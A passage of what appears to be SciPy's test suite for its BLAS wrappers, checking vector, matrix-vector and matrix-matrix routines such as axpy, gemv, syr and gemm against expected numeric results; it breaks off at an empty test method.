Run tests if scipy is installed:
python -c 'import scipy;scipy.linalg.test()'
"""
import math
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal, assert_,
assert_array_almost_equal, assert_allclose)
from pytest import raises as assert_raises
from numpy import float32, float64, complex64, complex128, arange, triu, \
tril, zeros, tril_indices, ones, mod, diag, append, eye, \
nonzero
from numpy.random import rand, seed
from scipy.linalg import _fblas as fblas, get_blas_funcs, toeplitz, solve, \
solve_triangular
try:
from scipy.linalg import _cblas as cblas
except ImportError:
cblas = None
REAL_DTYPES = [float32, float64]
COMPLEX_DTYPES = [complex64, complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def test_get_blas_funcs():
# check that it returns Fortran code for arrays that are
# fortran-ordered
f1, f2, f3 = get_blas_funcs(
('axpy', 'axpy', 'axpy'),
(np.empty((2, 2), dtype=np.complex64, order='F'),
np.empty((2, 2), dtype=np.complex128, order='C'))
)
# get_blas_funcs will choose libraries depending on most generic
# array
assert_equal(f1.typecode, 'z')
assert_equal(f2.typecode, 'z')
if cblas is not None:
assert_equal(f1.module_name, 'cblas')
assert_equal(f2.module_name, 'cblas')
# check defaults.
f1 = get_blas_funcs('rotg')
assert_equal(f1.typecode, 'd')
# check also dtype interface
f1 = get_blas_funcs('gemm', dtype=np.complex64)
assert_equal(f1.typecode, 'c')
f1 = get_blas_funcs('gemm', dtype='F')
assert_equal(f1.typecode, 'c')
# extended precision complex
f1 = get_blas_funcs('gemm', dtype=np.longcomplex)
assert_equal(f1.typecode, 'z')
# check safe complex upcasting
f1 = get_blas_funcs('axpy',
(np.empty((2, 2), dtype=np.float64),
np.empty((2, 2), dtype=np.complex64))
)
assert_equal(f1.typecode, 'z')
def test_get_blas_funcs_alias():
    """Aliasing rules: complex 'dot' resolves to dotc; real dotc/dotu fold to dot."""
    nrm2_c, dot_c = get_blas_funcs(('nrm2', 'dot'), dtype=np.complex64)
    assert nrm2_c.typecode == 'c'
    assert dot_c.typecode == 'c'

    dot_d, dotc_d, dotu_d = get_blas_funcs(('dot', 'dotc', 'dotu'),
                                           dtype=np.float64)
    assert dot_d is dotc_d
    assert dot_d is dotu_d
class TestCBLAS1Simple(object):
    """Smoke tests for the optional cblas wrappers.

    Each prefix is skipped individually when the wrapped routine is
    absent from the (possibly missing) cblas extension module.
    """

    def test_axpy(self):
        # real prefixes: y <- a*x + y
        for prefix in 'sd':
            axpy = getattr(cblas, prefix + 'axpy', None)
            if axpy is None:
                continue
            assert_array_almost_equal(axpy([1, 2, 3], [2, -1, 3], a=5),
                                      [7, 9, 18])
        # complex prefixes
        for prefix in 'cz':
            axpy = getattr(cblas, prefix + 'axpy', None)
            if axpy is None:
                continue
            assert_array_almost_equal(axpy([1, 2j, 3], [2, -1, 3], a=5),
                                      [7, 10j - 1, 18])
class TestFBLAS1Simple(object):
def test_axpy(self):
for p in 'sd':
f = getattr(fblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2, 3], [2, -1, 3], a=5),
[7, 9, 18])
for p in 'cz':
f = getattr(fblas, p+'axpy', None)
if f is None:
continue
assert_array_almost_equal(f([1, 2j, 3], [2, -1, 3], a=5),
[7, 10j-1, 18])
def test_copy(self):
for p in 'sd':
f = getattr(fblas, p+'copy', None)
if f is None:
continue
assert_array_almost_equal(f([3, 4, 5], [8]*3), [3, 4, 5])
for p in 'cz':
f = getattr(fblas, p+'copy', None)
if f is None:
continue
assert_array_almost_equal(f([3, 4j, 5+3j], [8]*3), [3, 4j, 5+3j])
def test_asum(self):
for p in 'sd':
f = getattr(fblas, p+'asum', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5]), 12)
for p in ['sc', 'dz']:
f = getattr(fblas, p+'asum', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j]), 14)
def test_dot(self):
for p in 'sd':
f = getattr(fblas, p+'dot', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5], [2, 5, 1]), -9)
def test_complex_dotu(self):
for p in 'cz':
f = getattr(fblas, p+'dotu', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j], [2, 3, 1]), -9+2j)
def test_complex_dotc(self):
for p in 'cz':
f = getattr(fblas, p+'dotc', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j], [2, 3j, 1]), 3-14j)
def test_nrm2(self):
for p in 'sd':
f = getattr(fblas, p+'nrm2', None)
if f is None:
continue
assert_almost_equal(f([3, -4, 5]), math.sqrt(50))
for p in ['c', 'z', 'sc', 'dz']:
f = getattr(fblas, p+'nrm2', None)
if f is None:
continue
assert_almost_equal(f([3j, -4, 3-4j]), math.sqrt(50))
def test_scal(self):
for p in 'sd':
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(2, [3, -4, 5]), [6, -8, 10])
for p in 'cz':
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(3j, [3j, -4, 3-4j]), [-9, -12j, 12+9j])
for p in ['cs', 'zd']:
f = getattr(fblas, p+'scal', None)
if f is None:
continue
assert_array_almost_equal(f(3, [3j, -4, 3-4j]), [9j, -12, 9-12j])
def test_swap(self):
for p in 'sd':
f = getattr(fblas, p+'swap', None)
if f is None:
continue
x, y = [2, 3, 1], [-2, 3, 7]
x1, y1 = f(x, y)
assert_array_almost_equal(x1, y)
assert_array_almost_equal(y1, x)
for p in 'cz':
f = getattr(fblas, p+'swap', None)
if f is None:
continue
x, y = [2, 3j, 1], [-2, 3, 7-3j]
x1, y1 = f(x, y)
assert_array_almost_equal(x1, y)
assert_array_almost_equal(y1, x)
def test_amax(self):
for p in 'sd':
f = getattr(fblas, 'i'+p+'amax')
assert_equal(f([-2, 4, 3]), 1)
for p in 'cz':
f = getattr(fblas, 'i'+p+'amax')
assert_equal(f([-5, 4+3j, 6]), 1)
# XXX: need tests for rot,rotm,rotg,rotmg
class TestFBLAS2Simple(object):
def test_gemv(self):
for p in 'sd':
f = getattr(fblas, p+'gemv', None)
if f is None:
continue
assert_array_almost_equal(f(3, [[3]], [-4]), [-36])
assert_array_almost_equal(f(3, [[3]], [-4], 3, [5]), [-21])
for p in 'cz':
f = getattr(fblas, p+'gemv', None)
if f is None:
continue
assert_array_almost_equal(f(3j, [[3-4j]], [-4]), [-48-36j])
assert_array_almost_equal(f(3j, [[3-4j]], [-4], 3, [5j]),
[-48-21j])
def test_ger(self):
for p in 'sd':
f = getattr(fblas, p+'ger', None)
if f is None:
continue
assert_array_almost_equal(f(1, [1, 2], [3, 4]), [[3, 4], [6, 8]])
assert_array_almost_equal(f(2, [1, 2, 3], [3, 4]),
[[6, 8], [12, 16], [18, 24]])
assert_array_almost_equal(f(1, [1, 2], [3, 4],
a=[[1, 2], [3, 4]]), [[4, 6], [9, 12]])
for p in 'cz':
f = getattr(fblas, p+'geru', None)
if f is None:
continue
assert_array_almost_equal(f(1, [1j, 2], [3, 4]),
[[3j, 4j], [6, 8]])
assert_array_almost_equal(f(-2, [1j, 2j, 3j], [3j, 4j]),
[[6, 8], [12, 16], [18, 24]])
for p in 'cz':
for name in ('ger', 'gerc'):
f = getattr(fblas, p+name, None)
if f is None:
continue
assert_array_almost_equal(f(1, [1j, 2], [3, 4]),
[[3j, 4j], [6, 8]])
assert_array_almost_equal(f(2, [1j, 2j, 3j], [3j, 4j]),
[[6, 8], [12, 16], [18, 24]])
def test_syr_her(self):
x = np.arange(1, 5, dtype='d')
resx = np.triu(x[:, np.newaxis] * x)
resx_reverse = np.triu(x[::-1, np.newaxis] * x[::-1])
y = np.linspace(0, 8.5, 17, endpoint=False)
z = np.arange(1, 9, dtype='d').view('D')
resz = np.triu(z[:, np.newaxis] * z)
resz_reverse = np.triu(z[::-1, np.newaxis] * z[::-1])
rehz = np.triu(z[:, np.newaxis] * z.conj())
rehz_reverse = np.triu(z[::-1, np.newaxis] * z[::-1].conj())
w = np.c_[np.zeros(4), z, np.zeros(4)].ravel()
for p, rtol in zip('sd', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr', None)
if f is None:
continue
assert_allclose(f(1.0, x), resx, rtol=rtol)
assert_allclose(f(1.0, x, lower=True), resx.T, rtol=rtol)
assert_allclose(f(1.0, y, incx=2, offx=2, n=4), resx, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, y, incx=-2, offx=2, n=4),
resx_reverse, rtol=rtol)
a = np.zeros((4, 4), 'f' if p == 's' else 'd', 'F')
b = f(1.0, x, a=a, overwrite_a=True)
assert_allclose(a, resx, rtol=rtol)
b = f(2.0, x, a=a)
assert_(a is not b)
assert_allclose(b, 3*resx, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr', None)
if f is None:
continue
assert_allclose(f(1.0, z), resz, rtol=rtol)
assert_allclose(f(1.0, z, lower=True), resz.T, rtol=rtol)
assert_allclose(f(1.0, w, incx=3, offx=1, n=4), resz, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, w, incx=-3, offx=1, n=4),
resz_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, z, a=a, overwrite_a=True)
assert_allclose(a, resz, rtol=rtol)
b = f(2.0, z, a=a)
assert_(a is not b)
assert_allclose(b, 3*resz, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'her', None)
if f is None:
continue
assert_allclose(f(1.0, z), rehz, rtol=rtol)
assert_allclose(f(1.0, z, lower=True), rehz.T.conj(), rtol=rtol)
assert_allclose(f(1.0, w, incx=3, offx=1, n=4), rehz, rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, w, incx=-3, offx=1, n=4),
rehz_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, z, a=a, overwrite_a=True)
assert_allclose(a, rehz, rtol=rtol)
b = f(2.0, z, a=a)
assert_(a is not b)
assert_allclose(b, 3*rehz, rtol=rtol)
assert_raises(Exception, f, 1.0, x, incx=0)
assert_raises(Exception, f, 1.0, x, offx=5)
assert_raises(Exception, f, 1.0, x, offx=-2)
assert_raises(Exception, f, 1.0, x, n=-2)
assert_raises(Exception, f, 1.0, x, n=5)
assert_raises(Exception, f, 1.0, x, lower=2)
assert_raises(Exception, f, 1.0, x, a=np.zeros((2, 2), 'd', 'F'))
def test_syr2(self):
x = np.arange(1, 5, dtype='d')
y = np.arange(5, 9, dtype='d')
resxy = np.triu(x[:, np.newaxis] * y + y[:, np.newaxis] * x)
resxy_reverse = np.triu(x[::-1, np.newaxis] * y[::-1]
+ y[::-1, np.newaxis] * x[::-1])
q = np.linspace(0, 8.5, 17, endpoint=False)
for p, rtol in zip('sd', [1e-7, 1e-14]):
f = getattr(fblas, p+'syr2', None)
if f is None:
continue
assert_allclose(f(1.0, x, y), resxy, rtol=rtol)
assert_allclose(f(1.0, x, y, n=3), resxy[:3, :3], rtol=rtol)
assert_allclose(f(1.0, x, y, lower=True), resxy.T, rtol=rtol)
assert_allclose(f(1.0, q, q, incx=2, offx=2, incy=2, offy=10),
resxy, rtol=rtol)
assert_allclose(f(1.0, q, q, incx=2, offx=2, incy=2, offy=10, n=3),
resxy[:3, :3], rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, q, q, incx=-2, offx=2, incy=-2, offy=10),
resxy_reverse, rtol=rtol)
a = np.zeros((4, 4), 'f' if p == 's' else 'd', 'F')
b = f(1.0, x, y, a=a, overwrite_a=True)
assert_allclose(a, resxy, rtol=rtol)
b = f(2.0, x, y, a=a)
assert_(a is not b)
assert_allclose(b, 3*resxy, rtol=rtol)
assert_raises(Exception, f, 1.0, x, y, incx=0)
assert_raises(Exception, f, 1.0, x, y, offx=5)
assert_raises(Exception, f, 1.0, x, y, offx=-2)
assert_raises(Exception, f, 1.0, x, y, incy=0)
assert_raises(Exception, f, 1.0, x, y, offy=5)
assert_raises(Exception, f, 1.0, x, y, offy=-2)
assert_raises(Exception, f, 1.0, x, y, n=-2)
assert_raises(Exception, f, 1.0, x, y, n=5)
assert_raises(Exception, f, 1.0, x, y, lower=2)
assert_raises(Exception, f, 1.0, x, y,
a=np.zeros((2, 2), 'd', 'F'))
def test_her2(self):
x = np.arange(1, 9, dtype='d').view('D')
y = np.arange(9, 17, dtype='d').view('D')
resxy = x[:, np.newaxis] * y.conj() + y[:, np.newaxis] * x.conj()
resxy = np.triu(resxy)
resxy_reverse = x[::-1, np.newaxis] * y[::-1].conj()
resxy_reverse += y[::-1, np.newaxis] * x[::-1].conj()
resxy_reverse = np.triu(resxy_reverse)
u = np.c_[np.zeros(4), x, np.zeros(4)].ravel()
v = np.c_[np.zeros(4), y, np.zeros(4)].ravel()
for p, rtol in zip('cz', [1e-7, 1e-14]):
f = getattr(fblas, p+'her2', None)
if f is None:
continue
assert_allclose(f(1.0, x, y), resxy, rtol=rtol)
assert_allclose(f(1.0, x, y, n=3), resxy[:3, :3], rtol=rtol)
assert_allclose(f(1.0, x, y, lower=True), resxy.T.conj(),
rtol=rtol)
assert_allclose(f(1.0, u, v, incx=3, offx=1, incy=3, offy=1),
resxy, rtol=rtol)
assert_allclose(f(1.0, u, v, incx=3, offx=1, incy=3, offy=1, n=3),
resxy[:3, :3], rtol=rtol)
# negative increments imply reversed vectors in blas
assert_allclose(f(1.0, u, v, incx=-3, offx=1, incy=-3, offy=1),
resxy_reverse, rtol=rtol)
a = np.zeros((4, 4), 'F' if p == 'c' else 'D', 'F')
b = f(1.0, x, y, a=a, overwrite_a=True)
assert_allclose(a, resxy, rtol=rtol)
b = f(2.0, x, y, a=a)
assert_(a is not b)
assert_allclose(b, 3*resxy, rtol=rtol)
assert_raises(Exception, f, 1.0, x, y, incx=0)
assert_raises(Exception, f, 1.0, x, y, offx=5)
assert_raises(Exception, f, 1.0, x, y, offx=-2)
assert_raises(Exception, f, 1.0, x, y, incy=0)
assert_raises(Exception, f, 1.0, x, y, offy=5)
assert_raises(Exception, f, 1.0, x, y, offy=-2)
assert_raises(Exception, f, 1.0, x, y, n=-2)
assert_raises(Exception, f, 1.0, x, y, n=5)
assert_raises(Exception, f, 1.0, x, y, lower=2)
assert_raises(Exception, f, 1.0, x, y,
a=np.zeros((2, 2), 'd', 'F'))
def test_gbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 7
m = 5
kl = 1
ku = 2
# fake a banded matrix via toeplitz
A = toeplitz(append(rand(kl+1), zeros(m-kl-1)),
append(rand(ku+1), zeros(n-ku-1)))
A = A.astype(dtype)
Ab = zeros((kl+ku+1, n), dtype=dtype)
# Form the banded storage
Ab[2, :5] = A[0, 0] # diag
Ab[1, 1:6] = A[0, 1] # sup1
Ab[0, 2:7] = A[0, 2] # sup2
Ab[3, :4] = A[1, 0] # sub1
x = rand(n).astype(dtype)
y = rand(m).astype(dtype)
alpha, beta = dtype(3), dtype(-5)
func, = get_blas_funcs(('gbmv',), dtype=dtype)
y1 = func(m=m, n=n, ku=ku, kl=kl, alpha=alpha, a=Ab,
x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
def test_sbmv_hbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 6
k = 2
A = zeros((n, n), dtype=dtype)
Ab = zeros((k+1, n), dtype=dtype)
# Form the array and its packed banded storage
A[arange(n), arange(n)] = rand(n)
for ind2 in range(1, k+1):
temp = rand(n-ind2)
A[arange(n-ind2), arange(ind2, n)] = temp
Ab[-1-ind2, ind2:] = temp
A = A.astype(dtype)
A = A + A.T if ind < 2 else A + A.conj().T
Ab[-1, :] = diag(A)
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
alpha, beta = dtype(1.25), dtype(3)
if ind > 1:
func, = get_blas_funcs(('hbmv',), dtype=dtype)
else:
func, = get_blas_funcs(('sbmv',), dtype=dtype)
y1 = func(k=k, alpha=alpha, a=Ab, x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
def test_spmv_hpmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 4 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
xlong = arange(2*n).astype(dtype)
ylong = ones(2*n).astype(dtype)
alpha, beta = dtype(1.25), dtype(2)
if ind > 3:
func, = get_blas_funcs(('hpmv',), dtype=dtype)
else:
func, = get_blas_funcs(('spmv',), dtype=dtype)
y1 = func(n=n, alpha=alpha, ap=Ap, x=x, y=y, beta=beta)
y2 = alpha * A.dot(x) + beta * y
assert_array_almost_equal(y1, y2)
# Test inc and offsets
y1 = func(n=n-1, alpha=alpha, beta=beta, x=xlong, y=ylong, ap=Ap,
incx=2, incy=2, offx=n, offy=n)
y2 = (alpha * A[:-1, :-1]).dot(xlong[3::2]) + beta * ylong[3::2]
assert_array_almost_equal(y1[3::2], y2)
assert_almost_equal(y1[4], ylong[4])
def test_spr_hpr(self):
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 4 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
alpha = (DTYPES+COMPLEX_DTYPES)[mod(ind, 4)](2.5)
if ind > 3:
func, = get_blas_funcs(('hpr',), dtype=dtype)
y2 = alpha * x[:, None].dot(x[None, :].conj()) + A
else:
func, = get_blas_funcs(('spr',), dtype=dtype)
y2 = alpha * x[:, None].dot(x[None, :]) + A
y1 = func(n=n, alpha=alpha, ap=Ap, x=x)
y1f = zeros((3, 3), dtype=dtype)
y1f[r, c] = y1
y1f[c, r] = y1.conj() if ind > 3 else y1
assert_array_almost_equal(y1f, y2)
def test_spr2_hpr2(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 3
A = rand(n, n).astype(dtype)
if ind > 1:
A += rand(n, n)*1j
A = A.astype(dtype)
A = A + A.T if ind < 2 else A + A.conj().T
c, r = tril_indices(n)
Ap = A[r, c]
x = rand(n).astype(dtype)
y = rand(n).astype(dtype)
alpha = dtype(2)
if ind > 1:
func, = get_blas_funcs(('hpr2',), dtype=dtype)
else:
func, = get_blas_funcs(('spr2',), dtype=dtype)
u = alpha.conj() * x[:, None].dot(y[None, :].conj())
y2 = A + u + u.conj().T
y1 = func(n=n, alpha=alpha, x=x, y=y, ap=Ap)
y1f = zeros((3, 3), dtype=dtype)
y1f[r, c] = y1
y1f[[1, 2, 2], [0, 0, 1]] = y1[[1, 3, 4]].conj()
assert_array_almost_equal(y1f, y2)
def test_tbmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
k = 3
x = rand(n).astype(dtype)
A = zeros((n, n), dtype=dtype)
# Banded upper triangular array
for sup in range(k+1):
A[arange(n-sup), arange(sup, n)] = rand(n-sup)
# Add complex parts for c,z
if ind > 1:
A[nonzero(A)] += 1j * rand((k+1)*n-(k*(k+1)//2)).astype(dtype)
# Form the banded storage
Ab = zeros((k+1, n), dtype=dtype)
for row in range(k+1):
Ab[-row-1, row:] = diag(A, k=row)
func, = get_blas_funcs(('tbmv',), dtype=dtype)
y1 = func(k=k, a=Ab, x=x)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=1)
y2 = A.T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=2)
y2 = A.conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_tbsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 6
k = 3
x = rand(n).astype(dtype)
A = zeros((n, n), dtype=dtype)
# Banded upper triangular array
for sup in range(k+1):
A[arange(n-sup), arange(sup, n)] = rand(n-sup)
# Add complex parts for c,z
if ind > 1:
A[nonzero(A)] += 1j * rand((k+1)*n-(k*(k+1)//2)).astype(dtype)
# Form the banded storage
Ab = zeros((k+1, n), dtype=dtype)
for row in range(k+1):
Ab[-row-1, row:] = diag(A, k=row)
func, = get_blas_funcs(('tbsv',), dtype=dtype)
y1 = func(k=k, a=Ab, x=x)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=1)
y2 = solve(A.T, x)
assert_array_almost_equal(y1, y2)
y1 = func(k=k, a=Ab, x=x, diag=1, trans=2)
y2 = solve(A.conj().T, x)
assert_array_almost_equal(y1, y2)
def test_tpmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
x = rand(n).astype(dtype)
# Upper triangular array
A = triu(rand(n, n)) if ind < 2 else triu(rand(n, n)+rand(n, n)*1j)
# Form the packed storage
c, r = tril_indices(n)
Ap = A[r, c]
func, = get_blas_funcs(('tpmv',), dtype=dtype)
y1 = func(n=n, ap=Ap, x=x)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = A.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=1)
y2 = A.T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=2)
y2 = A.conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_tpsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
x = rand(n).astype(dtype)
# Upper triangular array
A = triu(rand(n, n)) if ind < 2 else triu(rand(n, n)+rand(n, n)*1j)
A += eye(n)
# Form the packed storage
c, r = tril_indices(n)
Ap = A[r, c]
func, = get_blas_funcs(('tpsv',), dtype=dtype)
y1 = func(n=n, ap=Ap, x=x)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(A, x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=1)
y2 = solve(A.T, x)
assert_array_almost_equal(y1, y2)
y1 = func(n=n, ap=Ap, x=x, diag=1, trans=2)
y2 = solve(A.conj().T, x)
assert_array_almost_equal(y1, y2)
def test_trmv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 3
A = (rand(n, n)+eye(n)).astype(dtype)
x = rand(3).astype(dtype)
func, = get_blas_funcs(('trmv',), dtype=dtype)
y1 = func(a=A, x=x)
y2 = triu(A).dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = triu(A).dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=1)
y2 = triu(A).T.dot(x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=2)
y2 = triu(A).conj().T.dot(x)
assert_array_almost_equal(y1, y2)
def test_trsv(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 15
A = (rand(n, n)+eye(n)).astype(dtype)
x = rand(n).astype(dtype)
func, = get_blas_funcs(('trsv',), dtype=dtype)
y1 = func(a=A, x=x)
y2 = solve(triu(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, lower=1)
y2 = solve(tril(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1)
A[arange(n), arange(n)] = dtype(1)
y2 = solve(triu(A), x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=1)
y2 = solve(triu(A).T, x)
assert_array_almost_equal(y1, y2)
y1 = func(a=A, x=x, diag=1, trans=2)
y2 = solve(triu(A).conj().T, x)
assert_array_almost_equal(y1, y2)
class TestFBLAS3Simple(object):
    """Minimal 1x1 gemm sanity checks for all four type prefixes."""

    def test_gemm(self):
        # real prefixes: c = alpha*a*b (+ beta*c when supplied)
        for prefix in 'sd':
            gemm = getattr(fblas, prefix + 'gemm', None)
            if gemm is None:
                continue
            assert_array_almost_equal(gemm(3, [3], [-4]), [[-36]])
            assert_array_almost_equal(gemm(3, [3], [-4], 3, [5]), [-21])
        # complex prefixes
        for prefix in 'cz':
            gemm = getattr(fblas, prefix + 'gemm', None)
            if gemm is None:
                continue
            assert_array_almost_equal(gemm(3j, [3 - 4j], [-4]), [[-48 - 36j]])
            assert_array_almost_equal(gemm(3j, [3 - 4j], [-4], 3, [5j]),
                                      [-48 - 21j])
def _get_func(func, ps='sdzc'):
"""Just a helper: return a specified BLAS function w/typecode."""
for p in ps:
f = getattr(fblas, p+func, None)
if f is None:
continue
yield f
class TestBLAS3Symm(object):
def setup_method(self):
self.a = np.array([[1., 2.],
[0., 1.]])
self.b = np.array([[1., 0., 3.],
[0., -1., 2.]])
self.c = np.ones((2, 3))
self.t = np.array([[2., -1., 8.],
[3., 0., 9.]])
def test_symm(self):
for f in _get_func('symm'):
res = f(a=self.a, b=self.b, c=self.c, alpha=1., beta=1.)
assert_array_almost_equal(res, self.t)
res = f(a=self.a.T, b=self.b, lower=1, c=self.c, alpha=1., beta=1.)
assert_array_almost_equal(res, self.t)
res = f(a=self.a, b=self.b.T, side=1, c=self.c.T,
alpha=1., beta=1.)
assert_array_almost_equal(res, self.t.T)
def test_summ_wrong_side(self):
f = getattr(fblas, 'dsymm', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a, 'b': self.b,
'alpha': 1, 'side': 1})
# `side=1` means C <- B*A, hence shapes of A and B are to be
# compatible. Otherwise, f2py exception is raised
def test_symm_wrong_uplo(self):
"""SYMM only considers the upper/lower part of A. Hence setting
wrong value for `lower` (default is lower=0, meaning upper triangle)
gives a wrong result.
"""
f = getattr(fblas, 'dsymm', None)
if f is not None:
res = f(a=self.a, b=self.b, c=self.c, alpha=1., beta=1.)
assert np.allclose(res, self.t)
res = f(a=self.a, b=self.b, lower=1, c=self.c, alpha=1., beta=1.)
assert not np.allclose(res, self.t)
class TestBLAS3Syrk(object):
def setup_method(self):
self.a = np.array([[1., 0.],
[0., -2.],
[2., 3.]])
self.t = np.array([[1., 0., 2.],
[0., 4., -6.],
[2., -6., 13.]])
self.tt = np.array([[5., 6.],
[6., 13.]])
def test_syrk(self):
for f in _get_func('syrk'):
c = f(a=self.a, alpha=1.)
assert_array_almost_equal(np.triu(c), np.triu(self.t))
c = f(a=self.a, alpha=1., lower=1)
assert_array_almost_equal(np.tril(c), np.tril(self.t))
c0 = np.ones(self.t.shape)
c = f(a=self.a, alpha=1., beta=1., c=c0)
assert_array_almost_equal(np.triu(c), np.triu(self.t+c0))
c = f(a=self.a, alpha=1., trans=1)
assert_array_almost_equal(np.triu(c), np.triu(self.tt))
# prints '0-th dimension must be fixed to 3 but got 5',
# FIXME: suppress?
# FIXME: how to catch the _fblas.error?
def test_syrk_wrong_c(self):
f = getattr(fblas, 'dsyrk', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a, 'alpha': 1.,
'c': np.ones((5, 8))})
# if C is supplied, it must have compatible dimensions
class TestBLAS3Syr2k(object):
def setup_method(self):
self.a = np.array([[1., 0.],
[0., -2.],
[2., 3.]])
self.b = np.array([[0., 1.],
[1., 0.],
[0, 1.]])
self.t = np.array([[0., -1., 3.],
[-1., 0., 0.],
[3., 0., 6.]])
self.tt = np.array([[0., 1.],
[1., 6]])
def test_syr2k(self):
for f in _get_func('syr2k'):
c = f(a=self.a, b=self.b, alpha=1.)
assert_array_almost_equal(np.triu(c), np.triu(self.t))
c = f(a=self.a, b=self.b, alpha=1., lower=1)
assert_array_almost_equal(np.tril(c), np.tril(self.t))
c0 = np.ones(self.t.shape)
c = f(a=self.a, b=self.b, alpha=1., beta=1., c=c0)
assert_array_almost_equal(np.triu(c), np.triu(self.t+c0))
c = f(a=self.a, b=self.b, alpha=1., trans=1)
assert_array_almost_equal(np.triu(c), np.triu(self.tt))
# prints '0-th dimension must be fixed to 3 but got 5', FIXME: suppress?
def test_syr2k_wrong_c(self):
f = getattr(fblas, 'dsyr2k', None)
if f is not None:
assert_raises(Exception, f, **{'a': self.a,
'b': self.b,
'alpha': 1.,
'c': np.zeros((15, 8))})
# if C is supplied, it must have compatible dimensions
class TestSyHe(object):
"""Quick and simple tests for (zc)-symm, syrk, syr2k."""
def setup_method(self):
self.sigma_y = np.array([[0., -1.j],
[1.j, 0.]])
def test_symm_zc(self):
